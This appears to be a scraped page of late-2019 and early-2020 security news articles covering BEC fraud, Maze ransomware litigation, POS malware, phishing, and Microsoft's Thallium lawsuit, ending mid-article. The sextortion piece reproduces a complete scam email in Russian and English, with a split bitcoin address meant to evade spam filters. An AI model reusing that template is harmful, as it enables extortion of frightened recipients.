Protecting Against Ransomware
Recovering from Viruses, Worms, and Trojan Horses
For those who are only interested in the best way to defend against a wiper malware attack, having a working backup of all the data is the best way to get back up and running just like in the case of a ransomware infection.

With a secure and safe backup, even if attackers are able to gain access to your network or computers and wipe data, you can simply and quickly restore all the data.

CISA Statement on Iranian Cybersecurity Threats

"Iran has leveraged wiper malware in destructive attacks on several occasions in recent years," John Hultquist, FireEye Director of Intelligence Analysis adds. "Though, for the most part, these incidents did not affect the most sensitive industrial control systems, they did result in serious disruptions to operations.

We are concerned that attempts by Iranian actors to gain access to industrial control system software providers could be leveraged to gain widespread access to critical infrastructure simultaneously. In the past, subverting the supply chain has been the means to prolific deployment of destructive malware by Russian and North Korean actors."

"We are already seeing Iranian disinformation efforts by these networks surrounding last night’s strike, and the U.S. should expect that Iranian influence efforts surrounding the U.S. will increase over the coming days or weeks as political developments evolve," Lee Foster, FireEye Intelligence Information Operations Analysis Senior Manager, also explains.


Colorado Town Wires Over $1 Million to BEC Scammers
6.1.2020 
Bleepingcomputer  Spam

Colorado Town of Erie lost more than $1 million to a business email compromise scam (BEC) that ended with the town's employees sending the funds to a bank account controlled by scammers.

BEC (otherwise known as Email Account Compromise) is a type of financial fraud through which crooks deceive an organization's employee via computer intrusion or by using social engineering into wiring out funds to attacker-controlled bank accounts.

The fraudsters used an electronic form on the town's website to request a change to the payment information on the building contract for Erie Parkway Bridge awarded to SEMA Construction in October 2018.

"Specifically, the change was to receive payments via electronic funds transfer rather than by check," Erie Town Administrator Malcolm Fleming said in an email memo according to The Denver Post.

"Although town staff checked some of the information on the form for accuracy, they did not verify the authenticity of the submission with SEMA Construction; they accepted the form and updated the payment method."

Scammers get the money, Erie employee resigns
While Erie staff should follow guidelines designed to verify the authenticity of payment information change requests, in this case, the Erie staff member failed to do so.

This resulted in the payment information used to wire roughly $1,01 million to SEMA on October 25, 2019, pointing to the attackers' accounts.

"Once the payments were in that account, the perpetrators of this fraud sent the money via wire transfer out of the country," Fleming added in his email memo.

The fraud was subsequently confirmed on November 5, when Erie staff was alerted by the bank of a possible fraud attempt and the staff was told by SEMA that the payment method request was not made from their end.

SEMA was later paid on November 15 for the Erie Parkway Bridge project completion using physical checks, the initial payment method the contractor chose at the beginning of the contract.

The town is actively using other information gleaned from the investigations to identify potential risk and to mitigate those risks. - Malcolm Fleming

Following the incident, the Town of Erie first removed the contact form from the website and temporarily discontinued electronic payments. A finance manager and an accounting manager position were also added to the staff scheme to add additional oversight to future financial operations.

"The town has filled the risk manager’s position and is actively recruiting for the accounting and finance manager positions," Fleming explained.

"These additional positions will provide additional support, oversight, segregation of duties and management of the town’s financial operations, which have expanded significantly in magnitude and complexity as the town has grown in population."

The Town of Erie staff, the town's police department and the Federal Bureau of Investigation are investigating the incident. The town is also currently working on recovering the funds lost to the BEC scammers.

Bleeping Computer has reached out to the Town of Erie for for comment, but had not heard back at the time of this publication. This article will be updated when a response is received.

BEC scams are big
BEC victims lost more than $1,2 billion in 2018 per an Internet Crime report published by the FBI Internet Crime Complaint Center (IC3).

The Financial Crimes Enforcement Network (FinCEN) issued its own report saying that BEC SAR (short for suspicious activity reports) filings increased from a $110 million monthly average in 2016 to more than $301 million monthly in 2018.

More recently, the FBI said in a BEC public service announcement from September 2019 that victim complaints with a total exposed dollar loss of more than $26 billion and related to 166,349 incidents were received from June 2016 to July 2019.

While hard to believe at first, these figures are backed by recently reported incidents such as the one in which Nikkei, one of the world's largest media organizations, reported a BEC scam that came with a loss of roughly $29 million in October.

In early September, a member of the Toyota Group also announced that it had fell victim to the same type of fraud, the expected financial loss being more than over $37 million.


Maze Ransomware Sued for Publishing Victim's Stolen Data
6.1.2020 
Bleepingcomputer  Ransomware

The anonymous operators behind the Maze Ransomware are being sued by a victim for illegally accessing their network, stealing data, encrypting computers, and publishing the stolen data after a ransom was not paid.

The company suing Maze is Southwire, a leading wire and cable manufacturer from Carrollton, Georgia, who was attacked in December 2019. As part of this attack, the ransomware allegedly stole 120GB of data and encrypted 878 devices.

After a ransom of 850 bitcoins, or $6 million. was not paid by Southwire, the Maze operators published a portion of their stolen data on a "news" site that the threat actors created.

Southwire Data Published by Maze
Southwire Data Published by Maze
This site is hosted at an ISP in Ireland that Southwire states that they contacted repeatedly but did not receive a response.

Southwire sues Maze operatings
On December 31st, 2019, Southwire filed a lawsuit in the Northern District of Georgia, USA against the Maze operators and sought injunctions against a hosting provider in Ireland for hosting the Maze news site and stolen files.

In a civil action against "John Doe", Southwire is requesting injunctive relief and damages against the Maze operators for the encryption of their network and the publishing of stolen data retrieved during the ransomware attack.

"This is a civil action for injunctive relief and damages against Defendant arising under the Computer Fraud and Abuse Act, 18 U.S.C. § 1030, and the common law of trespass to chattels. As further alleged below, Defendant wrongfully accessed Southwire’s computer systems and extracted Southwire’s confidential business information and other sensitive information from the computer systems. Defendant then demanded several million dollars to keep the information private, but after Southwire refused Defendant’s extortion, Defendant wrongfully posted part of Southwire’s confidential information on a publicly-accessible website that Defendant controls."

While it may appear strange to file a lawsuit against the Maze operators, several lawyers that BleepingComputer spoke to stated it may be to reserve their spot for monetary damages in the event that money is recovered by the government. This action could also be used to provide injunctive relief against any U.S. based hosting provider or organization that publishes the data stolen by Maze.

"Title 18, United States Code, Section 1030(g) provides that “any person who suffers damage or loss by reason of a violation of this security may maintain a civil action against the violator to obtain compensatory damages and injunctive relief or other equitable relief.” Under 18 U.S.C. § 1030(g), (a)(2)(C), and (c)(4)(A)(i)(I), a civil action may be brought if the conduct involves a loss during any one-year period aggregating at least $5,000 in value.

Defendant violated the Computer Fraud and Abuse Act, 18 U.S.C. § 1030(a)(2)(C), by knowingly and intentionally accessing Southwire’s protected computers without authorization or in excess of any authorization and thereby obtaining information from the protected computers in a transaction involving an interstate or foreign communication."

As part of the lawsuit, two exhibits were includes; one of the ransom note and a redacted image, which was most likely the stolen data or maze news site.

Exhibit 1
Exhibit 1 (Click to enlarge)
Southwire seeks injunctive relief in Ireland
In a related action, counsel for Southwire requested injunctive relief from the courts of Ireland against the company hosting the Maze news site and the stolen files.

According to the TheJournal.ie, Southwire made repeated demands to the web hosting company named World Hosting Farm Limited, who is hosting the Maze news site, to remove their stolen data, but never received a response.

Due to this, the company sought injuctive relief against the involved parties.

"The injunction requires the defendants to remove all data relating to Southwire and its customers from the website," TheJournal.ie reported. "The order also compels the defendants to hand up all data taken from Southwire, and that no further material is taken from the US firm be published on the internet or anywhere else."

The temporary injunction was granted in part, but the court did not prohibit the media from mentioning the victim's name as part of their reporting.

Since then, BleepingComputer can confirm that the Maze news site has been taken down by the hosting company and is no longer accessible.

It is not known if the Maze team will attempt to host their news site with another hosting provider or move it to Tor where it will be much harder to take down.

This could also be a dangerous move by Southwire as it could lead to the Maze operators releasing all of the stolen data rather than just a few files.

"This is a bold but risky move by Southwire. It could push the Maze Group into releasing all of the company’s data while the website takedown could result in a game of whack-a-mole in which the data is published in other, possibly more visible, locations,” Emsisoft threat analyst Brett Callow told BleepingComputer via an email conversation.

With the Maze operators being very public regarding their operations and willingness to publish stolen data, this could be a move that could lead to more data being exposed.

BleepingComputer has contacted the lawyers for Southwire with questions regarding their lawsuit, but have not heard back at this time.

Update 1/3/2020:

On the same day as the courts in Ireland issued an injunction, the Maze news site was taken down.

In response to our queries, we received the following statement from Artur Grabowski, the CEO of World Hosting Farm LTD, about their shutting down of the Maze "news" site that was hosted at his company.

"At 22.12.2019 IP 185.234.219.190 was banned and no longer visible.

After 24h, owner of this IP asked for enable IP and said he will remove all data. After 48h, data was not removed, but due holidays, we didn`t check that. One of administrators has blocked IP and server again at 31.12.2019

Disk has been secured for police if needed."


Python 2.7 Reaches End of Life After 20 Years of Development
6.1.2020 
Bleepingcomputer  IT

As of January 1st, 2020, Python 2.7 has officially reached the end of life and will no longer receive security updates, bug fixes, or other improvements going forward.

Released in 2000, Python 2.7 has been used by developers, administrators, and security professionals for 20 years. While Python 3 was released in 2006, due to the number of users continuing to use 2.7, the Python team decided to support both development branches.

Originally slated to be retired in 2015, the development team pushed the sunset of Python 2.7 to 2020.

To focus on Python 3 and increase the speed of its development and bug fixes, the development team has now sunset Python 2.7 and the team recommends that all users upgrade to Python 3 to continue receiving important updates.

"We are volunteers who make and take care of the Python programming language. We have decided that January 1, 2020, will be the day that we sunset Python 2. That means that we will not improve it anymore after that day, even if someone finds a security problem in it. You should upgrade to Python 3 as soon as you can."

Python does plan on releasing one more version of Python 2.7 in April 2020, which will be its final release. This release will include bug and security fixes that were developed in 2019, and possibly later ones as determined by the release manager, to ensure the stability of the final release.

For those who require Python 2.7 and do not wish to upgrade their scripts or applications, they can switch to PyPy, which will continue to support Python 2.7 after 2020. This, though, may not be fully compatible as third-party developers update their libraries to support Python 3.

Linux distributions and the sunset of Python 2.7
As Python 2.7 reaches the end of life, Linux distributions are also changing how they will continue to support the legacy version of Python.

Most of the distributions are following the same practice of adding upgraded packages for dependencies and libraries that support Python 3.x with the eventual goal of switching to Python 3 as the default version.

This process will take quite some time, so Python 2.7 will continue to be offered.

Red Hat
Red Hat has stated that even though the Python Software Foundation (PSF) has retired Python 2.7, they will continue to support it through the normal RHEL lifecycle.

"Just because the PSF consider Python 2 "unsupported" does not mean that Python 2 is "unsupported" within RHEL."

For Red Hat Enterprise Linux 8, the Python 2.7 package will be supported until June 2024. After this date, Red Hat will recommend that users upgrade to Python 3, but customers may continue to use 2.7 in a self-supported manner.

"After this date, customers are encouraged to upgrade to a later Python release such as Python 3. Customers may also continue with Python 2.7 as self-supported without official Red Hat Support."

Debian and Ubuntu
Both Debian and Ubuntu have started updating Python 2 libraries to their Python 3 equivalents in the preparation of the sunset of Python 2.7.

As of Debian Buster (10x) and Ubuntu 18.04 LTS, Python 3 is the default version, but Python 2.7 will still be available for those wishing to install it.

Fedora
Like the other distributions, Fedora has been updating Python 2 packages to the Python 3 equivalents.

In the current release of Fedora 31, Python 3.6 is the default version installed, though.

Fedora with Python 3.7 as default

Fedora with Python 3.7 as default
Python 2.7 is still available as an installable package.

Kali Linux
Like Ubuntu, Kali Linux is following Debian's lead and has begun adding support for packages upgraded to Python 3.

Once all packages and dependencies are upgraded to Python 3, Kali will eventually remove Python 2.x.


Poloniex Forces Password Reset After Data Leak Found Online
6.1.2020 
Bleepingcomputer  Incindent

The Poloniex cryptocurrency trading platform has reset some of their user's passwords after a list of alleged username and password combinations was found circulating on Twitter.

On December 30th, 2019, users began receiving an email from Poloniex stating that their user name and password for the trading site may have been included in a data leak circulating on Twitter.

Tweet from @charlysatoshi
Tweet from @charlysatoshi
This email went on to say that some of the email addresses in the leak did not contain legitimate Poloniex accounts, but to be safe the trading platform is forcing a password reset on any email addresses that do have an account with them.

"A couple of hours ago we discovered that someone leaked a list of email addresses and passwords on Twitter, claiming the information could be used to log in to Poloniex accounts. While almost all of the email addresses listed do not belong to Poloniex accounts, we are forcing a password reset on any email addresses listed that do not have an account with us, including yours."

Due to the lack of information in the email, some users were unsure if this was a scam or a fake email from Poloniex.

Soon after, the official support account for Poloniex on Twitter tweeted that the email was legitimate and that users should reset their passwords.

Poloniex confirms the email is real
Poloniex confirms the email is real
It is not known how this list of accounts was created, but it could have been compiled via credential stuffing attacks using accounts leaked in other data breaches.

Unfortunately, as Poloniex themselves do not know the source of the data, BleepingComputer suggests that all Poloniex users reset their passwords to be safe.

Change passwords to prevent credential stuffing attacks
If you received this email from Poloniex and you use the same username and password at other sites, BleepingComputer strongly suggests that you change your password at these other sites as well to prevent credential stuffing attacks.

A credential stuffing attack is when attackers compile usernames and passwords that were leaked from different company's data breaches and use those credentials to try and gain access to accounts at other sites. This type of attack works particularly well against users who use the same password at every site.

To avoid have your credentials used in this type of attack, be sure to use unique passwords at every site that you visit. To make it easier to remember strong and unique passwords, a password manager is highly recommended.


Popular U.S. Restaurant Owner Hit by Credit Card Stealing Malware
6.1.2020 
Bleepingcomputer  Virus

Landry's, a U.S. restaurant chain and property owner has disclosed that they were infected with a point-of-sale (POS) malware that allowed attackers to steal customer's credit card information.

Landry's owns and operates over 600 restaurants, with 60 well-known brands such as Landry's Seafood, Chart House, Saltgrass Steak House, Bubba Gump Shrimp Co., Claim Jumper, Morton's The Steakhouse, McCormick & Schmick's, Mastro's Restaurant, Rainforest Cafe, Del Frisco's Grill, and many more.

In a "Notice of Data Breach", Landry's has disclosed that an unauthorized user was detected on their systems and after completing an investigation it was discovered that POS malware was present on their systems between March 13, 2019, and October 17, 2019. At some locations, the malware may have been installed as early as January 18, 2019.

This POS malware could have been used under "rare circumstances" to steal customer's credit card information including cardholder name, card number, expiration date, and internal verification code

"We are notifying customers of an incident that we recently identified and addressed involving payment cards that, in rare circumstances, appear to have been mistakenly swiped by waitstaff on devices used to enter kitchen and bar orders, which are different devices than the point-of-sale terminals used for payment processing. This notice explains the incident, measures we have taken, and some steps you can take in response."

In 2016, Landry's implemented end-to-end encryption payment systems in all owned locations. Any cards swiped using devices on this end-to-end encryption system would not have been stolen by the POS malware.

Similar to an incident at Catch Restaurant, the locations owned by Landry's also have order-entry systems with attached card readers that do not use encryption. If a waitstaff mistakenly used one of these systems to process a credit card payment, the POS malware would have been able to steal payment information and send it to the attackers.

This data breach could be the largest one affecting the restaurant industry that we have seen this past year, not only due to the amount of locations, but also due to the clientele.

Some of the restaurant properties owned by Landry's, such as Morton's, Del Frisco's, and Mastro's, are very popular with business crowds and are very expensive. This could have allowed attackers to gain access to corporate credit cards with very high limits.

Anyone who has dined at these restaurants between January 18, 2019, and October 17, 2019, should contact their credit card company and let them know what has happened.

Customers should also monitor their credit card statements for fraudulent or suspicious charges and immediately dispute them if they are not recognized.


Ransomware Attackers Offer Holiday Discounts and Greetings
6.1.2020 
Bleepingcomputer  Ransomware

To celebrate the holidays, ransomware operators are providing discounts or season's greetings to entice victims into paying a ransom demand.

As ransomware operators look at their organizations as a business, it is not surprising to see them offering discounts or season's greetings to their victims.

Such is the case with the Sodinokibi Ransomware (REvil) who MalwareHunterTeam noticed had changed their ransom note over the holidays to include a new message wishing the victims a "Merry Christmas and Happy Holidays".

REvil Holiday Ransom Note
REvil Holiday Ransom Note
The REvil ransom note goes on to suggest that instead of being stressed over the holidays, victims should pay the ransom so that they "have a great opportunity to enter the new year, leaving all the bad in the outgoing year. I advise you to write to us as soon as possible and not waste your precious time that you can spend with your family."

I am not sure this will have much effect on getting a victim to pay, but it does add a psychological impact to those who have to deal with them during the holidays.

Maze offered a holiday discount
The Maze operators took it a step further with their holiday celebrations by offering a discount to victims.

In a message to BleepingComputer, the Maze operators stated that they were offering a 25% discount if victims paid between December 25th and December 31st.

"We give 25% discount from 25-th december til 31-th December (included) for those who pays in this period of time. Merry christmas."

It is not known if they applied this discount retroactively to all of their victims, contacted them via the chat service, or some other means.

As part of a "new year celebration", the Maze operators have also told BleepingComputer that they are discounting the City of Pensacola's ransom to $500,000 and will no longer share their documents.

"Due to the upcoming new year celebration, we decided not to publish the Pensacola city private information and delete their data completely from our servers, but the article will remain on our news site. We are making a discount of 500 000 USD for them, after the payment, we will remove the article from our news site and give them decryptors," the Maze operators told BleepingComputer.

It is BleepingComputer's understanding that the City has no intention of paying the ransom.

Don't pay, but if you have to, always negotiate
The general rule is that ransomware victims should never pay a ransom as it only encourages this type of criminal behavior. Instead, users should restore files through backups or by recreating the data.

At the same time, recovering data may not always be an option and businesses are forced to make a ransom payment.

While the holidays have come and gone, if you decide to pay the ransom, make sure to negotiate with the ransomware operators as almost all of them are known to accept lower payments than initially demanded.

If you do not feel comfortable negotiating the payment yourself, you can use a trusted ransomware negotiation service like Coveware to handle this for you.


Starbucks Devs Leave API Key in GitHub Public Repo
1.1.2020 
Bleepingcomputer  Security

One misstep from developers at Starbucks left exposed an API key that could be used by an attacker to access internal systems and manipulate the list of authorized users.

The severity rating of the vulnerability was set to critical as the key allowed access to a Starbucks JumpCloud API.

Serious impact
Vulnerability hunter Vinoth Kumar found the key in a public GitHub repository and disclosed it responsibly through the HackerOne vulnerability coordination and bug bounty platform.

JumpCloud is an Active Directory management platform billed as an Azure AD alternative. It provides user management, web app single sign-on (SSO) access control, and Lightweight Directory Access Protocol (LDAP) service.

Kumar reported the oversight on October 17 and close to three weeks later Starbucks responded it demonstrated "significant information disclosure" and that it qualified for a bug bounty.

Starbucks took care of the problem much sooner, though as Kumar noted on October 21 that the repository had been removed and the API key had been revoked.

The company took longer to respond because they needed to "to make sure we understand the severity of the issue and that all appropriate remediation steps have been taken."

Along with identifying the GitHub repository and specifying the file hosting the API key, Kumar also provided proof-of-concept (PoC) code demonstrating what an attacker could do with the key.

Apart from listing systems and users, adversaries could also take control of the Amazon Web Services (AWS) account, execute commands on systems, and add or remove users with access to the internal systems.

Paying the bounties
Once Starbucks was content with the remediation steps taken, the company paid Kumar a $4,000 bounty for the disclosure, which is the maximum reward for critical vulnerabilities. Most bounties from Starbucks are between $250-$375.

The company solved 834 reports since launching the bug bounty program in 2016, and 369 of them were reported in the past three months. For them, Starbucks spent $40,000.

Another significant vulnerability reported to Starbucks this year is an oversight that could be leveraged to take control of a company subdomain. The issue was that a subdomain pointed to an Azure cloud host that had been abandoned. Starbucks paid $2,000 for the report.


Sextortion Email Scammers Try New Tactics to Bypass Spam Filters
1.1.2020 
Bleepingcomputer  Spam

Sextortion scammers have started to utilize new tactics to bypass spam filters and secure email gateways so that their scam emails are delivered to their intended recipients.

Sextortion scams are emails that pretend to be from an attacker who has hacked your PC and installed malware that can monitor what sites you visit and create videos using your webcam.

These emails go on to state that they have created a video of you while watching adult web sites and will send the video to all of your contacts unless you pay an extortion demand.

Sextortion scams have become so common that spam filters and secure mail gateways have been doing a good job at preventing them from being delivered to their recipients

Using new evasion tactics
To bypass these filters, attackers have started to utilize new tactics such as sending sextortion emails in foreign languages and splitting bitcoin addresses into two parts.

This is illustrated in a new sextortion email shared with BleepingComputer where the scammers are sending these emails to English speaking users but with the content written in Russian.

As can be seen in the email below, the only text in English is the instructions to "Use google translator."

Sextortion Email
Sextortion Email
The text in the email is Russian as shown below.

Use google translator.

В последний раз Вы посетили порнографический веб-сайт с молодыми подростками, вы загрузили и установили автоматически шпионишь программное обеспечение, которое я создал. Моя программа включила вашу камеру и записала акт вашего возмущения и видео, которое вы наблюдали во время возмущения. Я также получил ваши списки контактов, номера телефонов, электронные письма, контакты в социальных сетях. У меня есть видео файл g_c.mp4 с ur mαsturbatioɳ и файл со всеми вашими контактами на моем жестком диске. Если вы хотите, чтобы я удалил оба файла и сохранил ваш секрет, вы должны передать мне биткойн-агент. Я даю вам 72 часа, чтобы перечислить средства.
Сумма: 0,14 бит-монеты (приблизительно)
Часть 1 бит-монеты: 3Bv9QgEw15QQo1T
Часть 2 бит-адреса: EUVW4hbBkkd2fEtFfPP
Важно: Вы должны соединить две части (часть 1 адреса бит-монета + часть 2 адреса бит-монеты) без пробелов между ними. Вы также можете сохранить это где-то, чтобы не потерять детали.
Быстрая подсказка! Вы можете купить Bit-Coin от Paxful. Используйте Google, чтобы найти его.
В следующий раз, когда вы закроете свои камеры, кто-нибудь может посмотреть это! Ограничьте себя один раз в месяц, если вы не можете полностью перейти на NoFap.
When translated to English using Google Translator, you can see that the email contains your typical sextortion scam described earlier in the article.

The last time you visited a pornographic website with young teens, you downloaded and installed automatically spy software that I created. My program turned on your camera and recorded the act of your indignation and the video that you observed during the indignation. I also received your contact lists, phone numbers, emails, contacts on social networks. I have a video file g_c.mp4 with ur mαsturbatioɳ and a file with all your contacts on my hard drive. If you want me to delete both files and keep your secret, you must pass me the bitcoin agent. I give you 72 hours to transfer funds.
Amount: 0.14 bit coins (approximately)

Part 1 Bit Coins: 3Bv9QgEw15QQo1T
Part 2 bit addresses: EUVW4hbBkkd2fEtFfPP

Important: You must connect the two parts (part 1 of the bit-coin address + part 2 of the address of the bit-coin) without spaces between them. You can also save this somewhere so as not to lose the details.

Quick tip! You can buy Bit-Coin from Paxful. Use Google to find it.
The next time you close your cameras, someone can watch this! Limit yourself once a month if you cannot completely switch to NoFap.
In addition to using a foreign language when targeting English speaking users, the scammers also break up the bitcoin address into two parts. They then provide instructions to combine the two parts to create the actual bitcoin address where an extortion payment should be sent to.

In this case, the resulting bitcoin address is 3Bv9QgEw15QQo1TEUVW4hbBkkd2fEtFfPP, which does not currently have any payments sent to it.

Adding these two tactics make it more difficult for the recipient to understand what they are receiving.

The attackers, though, are hoping that the potential evasion capabilities outweigh the complexity of translating the message.

As always, if you receive a sextortion email you do not have anything to worry about.

The scammers did not hack your computer, install malware that records you while on adult sites, and you should not send any payments to the enclosed bitcoin address.

Instead, mark the email as spam so that the filters can learn from these new tactics and detect them in the future.


How to Join the Windows Insider Program with a Local Account
1.1.2020 
Bleepingcomputer  OS

The Microsoft Windows Insider program allows consumers and professionals to preview the upcoming features of Windows 10 before they are shipped to consumers.

To join the program and install the preview builds, you normally need a Microsoft account and a PC running Windows 10. Unfortunately, you must link your Microsoft account and Windows 10 device to download and install any Insider preview builds.

An independent developer has now created a command-line script called 'Offline Insider Enroll' that allows Windows 10 PCs to enroll in the Insider program without a Microsoft account.

On Github, the developer explained that this script takes advantage of 'TestFlags' registry value to enroll a user into the program:

If this value is set to '0x20', all access to online Windows Insider services gets disabled. Because of this, we can set our own Windows Insider Preview configuration without being overridden by the contact to the service. Since Windows Update does not check if machine is actually enrolled to the program, you will get offered Insider Preview builds by just setting correct values in the registry.

The process is fairly easy to set up and takes place entirely in the Command Prompt as described below.

Install Windows 10 preview builds without a Microsoft account
Download the 'Offline Insider Enroll' script from the GitHub repository and save it anywhere in the local system.
Extract the archive to view the script.
To run the script, right-click on the file and select 'Run as administrator'.
After the script is executed, it will ask you to select the Ring to join. More information about the various Rings can be found here.
Script

After selecting a Ring to join, you will be prompted to reboot your computer, which you should do.
After rebooting the system, you can go into the Windows Insider Program control panel and see that you have now joined the selected ring.

Offline Windows Insider
Offline Windows Insider
To stop receiving Windows Insider builds, you can run the script again, but this time select X and then reboot the computer.


Special Olympics New York Hacked to Send Phishing Emails

1.1.2020  Bleepingcomputer  Phishing

Special Olympics of New York, a nonprofit organization focused on competitive athletes with intellectual disabilities, had its email server hacked around this year's Christmas holiday and later used to launch a phishing campaign against previous donors.

Special Olympics NY provides sports training and athletic competition to more than 67,000 children and adults with intellectual disabilities across New York State (66,835 registered athletes and unified partners according to this fact sheet).

The nonprofit sent a notification to disclose the security incident to the people affected, urging the donors to disregard the last received message and explaining that the hack only affected the "communications system" that stores only contact information and no financial data.

"As you may have noticed, our email server was temporarily hacked. We have fixed the problem and send our sincerest apologies," an email notification from Special Olympics New York told donors.

Security incident notification
Security incident notification (Image: Bleeping Computer)
"The hack was to our communications system, which only includes your contact information and not any financial data," the notification stated. "Please be assured that your contact information is protected and has been kept confidential."

Phishing for credentials
The phishing emails delivered by the attackers was camouflaged as an alert of an impending donation transaction that would automatically debit $1,942,49 from the target's account within two hours.

Using such a short time frame allowed the phishers to induce a sense of urgency designed to make the Special Olympics NY donors click on one of the two embedded hyperlinks, links that would supposedly redirect them to a PDF version of the transaction statement.

"Please review and confirm that all is correct, if you have any questions, please find my office ext number in the statement and call me back," the phishing emails said. "It is not a mistake, i verified all twice. Thank you, have a great weekend."

The phishing email utilized a Constant Contact tracking URL that redirected to the attackers' landing page. This page has since been taken down but was most likely used to steal donors' credit card details.

Phishing email sample
Phishing email sample (Image: Bleeping Computer)
In a statement, SVP of External Relations for Special Olympics NY Casey Vattimo said that donors can now make donations securely as the issue has now been fixed.

Additionally, all amounts donated to Special Olympics NY through December 31 will be tripled courtesy of Finish Line. If you wish to, you can donate by going to this donation page.

Olympics staff targeted in cyber-attacks
In related news, Tokyo 2020 Summer Olympics staff also issued a warning alerting of a phishing campaign that delivered emails designed to look like coming from the Tokyo Organizing Committee of the Olympic and Paralympic Games (Tokyo 2020).

They also said that the malicious emails most likely redirected the recipients to landing phishing sites or infected the victims' computers with malware if opened.

Last year, in February 2018, destructive malware dubbed Olympic Destroyer was used to sabotage systems of the Pyeongchang 2018 Winter Olympics as part of a coordinated attack that led to IT problems the opening ceremony such as failing Internet and television systems.

Two weeks before the Pyeongchang incident, McAfee researchers also released a report on a Powershell-based malware strain that was used to target the same Olympics organizers right before the event's start.


Microsoft Takes North Korean Hacking Group Thallium to Court
1.1.2020 
Bleepingcomputer  APT

Microsoft sued a cyber-espionage group with North Korean links tracked as Thallium for breaking into its customers' accounts and networks via spear-phishing attacks with the end goal of stealing sensitive information, as shown by a complaint unsealed on December 27.

"To manage and direct Thallium, Defendants have established and operate a network of websites, domains, and computers on the Internet, which they use to target their victims, compromise their online accounts, infect their computing devices, compromise the security of their networks, and steal sensitive information from them," Microsoft's complaint says.

The lawsuit was filed by Microsoft on December 18 in the U.S. District Court for the Eastern District of Virginia, as first reported by Bloomberg Law's Blake Brittain.

The precise identities and locations of those behind the activity are generally unknown but have been linked by many in the security community to North Korean hacking group or groups. - Microsoft

According to Microsoft, Thallium targets both public and private industry targets and it has been observed while previously attacking "government employees, organizations and individuals that work on Nuclear Proliferation issues, think tanks, university staff members, members of organizations that attempt to maintain world peace, human rights organizations, as well as many other organizations and individuals."

The North Korean hackers are also believed to have been active since at least 2010 according to Redmond's complaint, and it is known for being behind spear-phishing attacks they operate via legitimate services such as Gmail, Yahoo, and Hotmail.

A list of 50 domains used by Thallium in their attacks and taken down by Microsoft on a court order is available in Appendix A of the complaint.

"Our court case against Thallium, filed in the U.S. District Court for the Eastern District of Virginia, resulted in a court order enabling Microsoft to take control of 50 domains that the group uses to conduct its operations," said Tom Burt, Microsoft's Corporate Vice President of Customer Security & Trust, in a blog post after this article was published.

"With this action, the sites can no longer be used to execute attacks," Burt added.

Behind the STOLEN PENCIL APT campaign
Netscout's ATLAS Security Engineering & Response Team (ASERT) also tracks one of the North Korean hacking group's campaigns as STOLEN PENCIL.

According to Netscout, the hackers' STOLEN PENCIL APT campaign has been targeting academic institutions since at least May 2018 in spear-phishing attacks with the end goal of stealing credentials.

Based on several shared resources, Palo Alto Networks' Unit42 also linked Thallium's STOLEN PENCIL campaign with a malware dubbed BabyShark and delivered as part of a spear-phishing campaign focused "on gathering intelligence related to Northeast Asia’s national security issues," starting with November 2018.

"Well-crafted spear phishing emails and decoys suggest that the threat actor is well aware of the targets, and also closely monitors related community events to gather the latest intelligence," Unit42 said.

"While not conclusive, we suspect that the threat actor behind BabyShark is likely connected to the same actor who used the KimJongRAT malware family, and at least shares resources with the threat actor responsible for the STOLEN PENCIL campaign."

Samples of the KimJongRAT malware were observed dating back to 2010. The BabyShark malware is frequently sent to users as a malicious attachment to an email. The malware will drop a file with the file extension That file will then send a command that will beacon out to obtain an encoded script that is delivered back to the victim computer. - Microsoft

Microsoft confirmed these links in their Thallium complaint, saying that "in addition to targeting user's credentials, the Thallium defendants also utilize malware the most common being indigenous implants named 'BabyShark' and 'KimJongRAT' to compromise systems and steal data from victim systems."

"The Thallium defendants use misleading domains and Microsoft's trademarks to cause victims to click on the links that result in installation of this malware on the victims' computers," Microsoft adds.

"Once installed on a victim's computer, this malware exfiltrates information from the victim computer, maintains a persistent presence on the victim computer, and waits for further instructions from the Thallium."

Attacks targeting Microsoft customers
The North Korean state-sponsored Thallium was also previously mentioned by Redmond in July when the company said that it notified around 10,000 of its customers during the past year of being targeted or compromised by several other nation-state backed threat groups.

"About 84% of these attacks targeted our enterprise customers, and about 16% targeted consumer personal email accounts," said Microsoft Corporate Vice President for Customer Security & Trust, Tom Burt at the time.

Other APT groups from Iran and Russia were also found to be behind these nation-state attacks against Microsoft customers, with threat actors such as Holmium and Mercury operating from Iran and two actors operating from Russia tracked Yttrium and Strontium (aka Fancy Bear or APT28) leaving their prints around some of these malicious campaigns.

While observing cyber-espionage campaigns, Microsoft detected attacks targeting the 2016 U.S. presidential election and the last French presidential elections, with U.S. senatorial candidates also being targeted in 2018 by the Russian-backed Strontium hacking group.

Seizing Phosphorus and Fancy Bear domains
"This is the fourth nation-state activity group against which Microsoft has filed similar legal actions to take down malicious domain infrastructure. Previous disruptions have targeted Barium, operating from China, Strontium, operating from Russia, and Phosphorus, operating from Iran," Burt added.

"These actions have resulted in the takedown of hundreds of domains, the protection of thousands of victims and improved the security of the ecosystem."

The Microsoft Threat Intelligence Center (MSTIC) previously spotted the state-sponsored Iranian cyber-espionage group they track as Phosphorus (aka APT35, Charming Kitten, or Ajax Security Team), a group which attempted to gain account info on over 2,700 customers, attack 241 of them, and eventually compromised four of the attacked accounts between August and September.

Microsoft’s Digital Crimes Unit was able to block some of Phosphorus group's cyber attacks by taking over infrastructure domains used as part of their core operations, as court documents unsealed in March show.

By seizing 99 domains of their domains, Microsoft took over parts of the hacking group's operations and redirected traffic from infected devices to its sinkholes, thus collecting important info on the hacking group's activity.

The company also previously filed 15 similar cases against Strontium in August 2018, which later led to the seizure of 91 of their domains.


Wyze Exposes User Data via Unsecured ElasticSearch Cluster
1.1.2020 
Bleepingcomputer  Incindent

Smart home tech maker Wyze Labs confirmed that the user data of over 2.4 million of its users were exposed by an unsecured database connected to an Elasticsearch cluster for over three weeks, from December 4 to December 26.

The company discovered the incident after receiving an inquiry from an IPVM reporter via a "support ticket at 9:21 a.m. on December 26," immediately followed by IPVM publishing a piece "at 9:35 a.m" covering the exposed database discovered by security consulting firm Twelve Security.

However, as Dongsheng Song, Wyze's Co-Founder and Chief Product Officer said in a blog post, some of the reported information wasn't accurate.

"We do not send data to Alibaba Cloud. We don’t collect information about bone density and daily protein intake even from the products that are currently in beta testing," he said in response to Twelve Security's disclosure and IPVM's story. "We did not have a similar breach 6 months ago."

Troy Hunt

@troyhunt
This one impacting @WyzeCam looks pretty serious. Original public disclosure (which looks like it may have been made prematurely) is here: https://blog.12security.com/wyze/ https://twitter.com/WyzeCam/status/1210369296511070209 …

Wyze
